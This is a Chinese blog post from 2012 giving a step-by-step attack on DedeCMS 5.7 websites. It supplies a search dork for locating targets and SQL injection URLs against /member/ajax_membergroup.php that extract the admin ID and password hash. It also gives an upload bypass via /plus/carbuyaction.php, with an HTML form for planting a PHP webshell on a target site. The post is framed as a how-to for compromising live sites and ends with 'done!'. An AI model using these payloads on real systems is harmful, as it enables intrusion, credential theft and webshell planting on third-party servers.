dedecms5.7 的"上传"和"注入"漏洞

已为老胡 2012-07-21 PM 1397℃ 2条

这里用百度去搜索下关键字

“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”

获得使用DeDeCMS系统的网站。

①注入漏洞:访问“/data/admin/ver.txt”页面获取系统最后升级时间

然后访问/member/ajax_membergroup.php?action=post&membergroup=1

页面,如果出现“朋友

修改

”则说明存在该漏洞。

②然后写上语句

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码


得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,要登陆会员中心,然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”


如果出现‘你没有选择上传文件或者文件大小超过限制’提示,则说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm


<form action="=../dialog/select_soft_post]
<[/url">http://www.si1ence.cn/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>


把url改成目标url就行了。

搞定!

非特殊说明,本博所有文章均为博主原创。

评论啦~